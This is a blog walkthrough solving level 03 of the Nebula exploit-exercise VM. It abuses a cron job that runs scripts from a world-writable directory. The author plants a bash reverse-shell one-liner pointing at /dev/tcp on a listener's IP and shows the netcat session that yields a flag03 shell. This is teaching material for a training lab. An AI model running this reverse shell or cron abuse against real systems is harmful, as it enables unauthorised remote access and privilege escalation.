Post

Exploit Exercises: Nebula Level 03

Posted
By Lucian Nitescu 2 min read

Image of Nebula Terminal

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

Source code

There is no source code available for this level

Solution

Let’s jump in!

1
2
3
4
5
6
7
8
9

level03@nebula:/home/flag03$ ls -al
total 6
drwxr-x--- 3 flag03 level03  103 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag03 flag03   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag03 flag03   675 May 18  2011 .profile
drwxrwxrwx 2 flag03 flag03     3 Aug 18  2012 writable.d
-rwxr-xr-x 1 flag03 flag03    98 Nov 20  2011 writable.sh

Interesting! Let’s get more info about the task.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

level03@nebula:/home/flag03$ cd ./writable.d/
level03@nebula:/home/flag03/writable.d$ ls -al
total 0
drwxrwxrwx 2 flag03 flag03    3 Aug 18  2012 .
drwxr-x--- 3 flag03 level03 103 Nov 20  2011 ..
level03@nebula:/home/flag03/writable.d$

We have been told from the beginning that there is a crontab that is called every couple of minutes. But what is a crontab?

Wikipedia: The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals. It typically automates system maintenance or administration—though its general-purpose nature makes it useful for things like downloading files from the Internet and downloading email at regular intervals.

We will assume that the crontab is executing the only script we have “writable.sh”. Let’s look again at the code:

1
2
3
4
5
6

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i") (1)
	rm -f "$i" (2)
done

Well, simple! At line (1) we are executing a bash script and at line (2) we are removing that bash script from “/home/flag03/writable.d/*”. Fine, let’s get a shell!

1
2

lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080

Now let’s prepare our script.

1
2
3
4

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ echo "bash -i >& /dev/tcp/192.168.0.104/8080 0>&1" > shell.sh
level03@nebula:/home/flag03/writable.d$ cat shell.sh
bash -i >& /dev/tcp/192.168.0.104/8080 0>&1

Done. Now we wait for like 5 minutes to in order to get the crontab execution.

1
2
3
4
5
6
7
8
9
10
11

lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.0.100] port 8080 [tcp/*] accepted (family 2, sport 45702)
bash: no job control in this shell
flag03@nebula:~$ id
id
uid=996(flag03) gid=996(flag03) groups=996(flag03)
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$

See you in the next tutorial!

nebula, writeups
nebula writeups level exploit exercise tutorial solution
This post is licensed under CC BY 4.0 by the author.